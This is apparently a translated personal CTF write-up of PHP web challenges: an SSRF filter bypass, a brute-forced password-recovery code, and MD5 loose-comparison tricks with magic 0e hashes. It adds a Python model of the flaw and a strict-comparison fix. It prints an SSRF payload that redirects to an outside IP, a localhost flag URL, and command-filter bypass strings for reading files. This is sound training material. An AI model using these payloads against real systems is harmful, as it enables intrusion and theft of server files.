SSRF
Today I worked through an SSRF challenge and got a better grasp of SSRF (Server-Side Request Forgery).
In my own understanding: fopen(), file_get_contents(), curl() and fsockopen() can all give rise to an SSRF vulnerability. Through these functions, PHP code on the server can be called remotely and executed! The simplest example: file_get_contents() can read a file directly using the file:// protocol!
    <?php
    error_reporting(0);
    highlight_file(__FILE__);

    function filter($url) {
        $match_result = preg_match('/^(http|https)?:\/\/.*(\/)?.*$/', $url);
        if (!$match_result) {
            die('url fomat error');
        }
        try {
            $url_parse = parse_url($url);
        } catch (Exception $e) {
            die('url fomat error');
            return false;
        }
        $hostname = $url_parse['host'];
        $ip = gethostbyname($hostname);
        $int_ip = ip2long($ip);
        return ip2long('127.0.0.0') >> 24 == $int_ip >> 24
            || ip2long('10.0.0.0') >> 24 == $int_ip >> 24
            || ip2long('172.16.0.0') >> 20 == $int_ip >> 20
            || ip2long('192.168.0.0') >> 16 == $int_ip >> 16;
    }

    $url = $_GET['url'];
    if (!filter($url)) {
        echo file_get_contents($url);
    }
    ?>

Page output: url fomat error


exp:

    <?php echo 1111; header("location:http://8.131.72.215/1.txt");?>
I also saw an even more forceful payload: ?url=http://0.0.0.0/flag.php
签到 (sign-in)
Key points:

Then go to the password-recovery page!! The verification code is practically nonexistent! Just brute-force it with Burp.
ezphp
Key points:
    <?php
    error_reporting(0);
    highlight_file(__file__);
    include('flag.php');
    $string_1 = $_GET['str1'];
    $string_2 = $_GET['str2'];

    if ($_GET['param1'] !== $_GET['param2'] && md5($_GET['param1']) === md5($_GET['param2'])) {
        if (is_numeric($string_1)) {
            $md5_1 = md5($string_1);
            $md5_2 = md5($string_2);
            if ($md5_1 != $md5_2) {
                $a = strtr($md5_1, 'cxhp', '0123');
                $b = strtr($md5_2, 'cxhp', '0123');
                if ($a == $b) {
                    echo $flag;
                } else {
                    die('you are close');
                }
            } else {
                die("md5 is wrong");
            }
        } else {
            die('str1 not number');
        }
    } else {
        die('you are wrong!');
    }
    ?>

Page output: you are wrong!
The first check is a strict comparison!! When an array is passed in, the MD5 result is NULL, which gets past the first step!
    $_GET['param1']!==$_GET['param2']&&md5($_GET['param1'])===md5($_GET['param2'])
Second stage:

    $a = strtr($md5_1, 'cxhp', '0123');
    $b = strtr($md5_2, 'cxhp', '0123');
    if ($a == $b) {
        echo $flag;
    }
str1 must be numeric! The MD5 digests must not be equal, yet must be equal after the substitution! Keep working along that line!!!
First look at the PHP manual!!: https://www.php.net/manual/zh/function.strtr.php strtr (translate specified characters). 'from' and 'to' correspond character by character: c maps to 0, x maps to 1, and so on!!!!
That makes it easy! Since this is PHP loose comparison, just find a 0e value.
One thing to watch: only digits may follow 0e, no letters, otherwise the loose comparison fails!!
0e830400451993494058024219903391 == 0e11 is true; 0e83aa == 0e11 is false.
    string         md5
    QNKCDZO        0e830400451993494058024219903391
    s878926199a    0e545993274517709034328855841020
    s155964671a    0e342768416822451524974117254469
    s214587387a    0e848240448830537924465865611904
    s1091221200a   0e940624217856561557816327384675
    240610708      0e462097431906509019562988736854
    9427417        ce156443c7c7c4c63366466c25317636
    2120624        0e85776838554cc1775842c212686416
You can use 9427417. Its MD5 is ce156443c7c7c4c63366466c25317636; after strtr it becomes 0e followed by all digits, and the loose comparison succeeds!
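As an added example that is not part of the writeup: a Python model of the PHP loose-comparison rule the trick depends on (numeric strings such as 0e followed by digits all compare equal to 0), the strtr step, and the same gate rewritten with strict comparison, which is the fix. The function names and the simplified model of PHP's numeric-string rule are my own assumptions.

```python
import hashlib
import re

# PHP "numeric string": optional whitespace, sign, integer/decimal part, optional
# exponent (assumed model of PHP 8 rules).  "0e4620...54" matches and is the
# number 0; "0e83aa" and "ce1564..." do not match, so they stay plain strings.
_NUMERIC = re.compile(r'^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$')

def is_numeric_string(s: str) -> bool:
    return bool(_NUMERIC.match(s))

def php_loose_eq(a: str, b: str) -> bool:
    """Model of PHP == on two strings: both numeric -> compared as numbers
    (so every 0e<digits> digest equals every other), else byte-for-byte."""
    if is_numeric_string(a) and is_numeric_string(b):
        return float(a) == float(b)
    return a == b

def php_strtr(s: str, frm: str, to: str) -> str:
    """strtr($s, $from, $to): one-to-one character mapping, c->0, x->1, ..."""
    return s.translate(str.maketrans(frm, to))

def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()

def challenge_gate(str1: str, str2: str) -> bool:
    """The ezphp check as written (loose != and ==).  Two plain 0e digests
    already fail the != step, which is why the trick needs a digest that only
    turns into 0e<digits> after strtr."""
    if not is_numeric_string(str1):
        return False
    m1, m2 = md5_hex(str1), md5_hex(str2)
    if php_loose_eq(m1, m2):
        return False
    return php_loose_eq(php_strtr(m1, 'cxhp', '0123'),
                        php_strtr(m2, 'cxhp', '0123'))

def hardened_gate(str1: str, str2: str) -> bool:
    """Same check with strict (===) comparison of the digests: strings are
    only equal when byte-identical, so the 0e family no longer collides."""
    if not is_numeric_string(str1):
        return False
    m1, m2 = md5_hex(str1), md5_hex(str2)
    if m1 == m2:
        return False
    return php_strtr(m1, 'cxhp', '0123') == php_strtr(m2, 'cxhp', '0123')

if __name__ == '__main__':
    for pair in [('240610708', 'QNKCDZO'), ('9427417', '240610708')]:
        print(pair, 'loose:', challenge_gate(*pair), 'strict:', hardened_gate(*pair))
```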
I looked at the original challenge: 2019 NCTF web easyphp
    <?php
    error_reporting(0);
    highlight_file(__file__);
    $string_1 = $_GET['str1'];
    $string_2 = $_GET['str2'];
    $cmd = $_GET['q_w_q'];

    if ($_GET['num'] !== '23333' && preg_match('/^23333$/', $_GET['num'])) {
        echo '1st ok' . "<br>";
    } else {
        die('23333333');
    }

    if (is_numeric($string_1)) {
        $md5_1 = md5($string_1);
        $md5_2 = md5($string_2);
        if ($md5_1 != $md5_2) {
            $a = strtr($md5_1, 'cxhp', '0123');
            $b = strtr($md5_2, 'cxhp', '0123');
            if ($a == $b) {
                echo '2nd ok' . "<br>";
            } else {
                die("can u give me the right str???");
            }
        } else {
            die("no!!!!!!!!");
        }
    } else {
        die('is str1 numeric??????');
    }

    $query = $_SERVER['QUERY_STRING'];
    if (strlen($cmd) > 8) {
        die("too long :(");
    }
    if (substr_count($query, '_') === 0 && substr_count($query, '%5f') === 0) {
        $arr = explode(' ', $cmd);
        if ($arr[0] !== 'ls' || $arr[0] !== 'pwd') {
            if (substr_count($cmd, 'cat') === 0) {
                system($cmd);
            } else {
                die('ban cat :) ');
            }
        } else {
            die('bad guy!');
        }
    } else {
        die('nonono _ is bad');
    }
    ?>

Step 3: bypass the command-execution WAF: ca/t, ca''t, ca""t
c\a""t /f???, c\a""t *
. is the current directory, / is the root directory! Command-execution keyword bypasses: https://blog.csdn.net/qq_45927819/article/details/109671655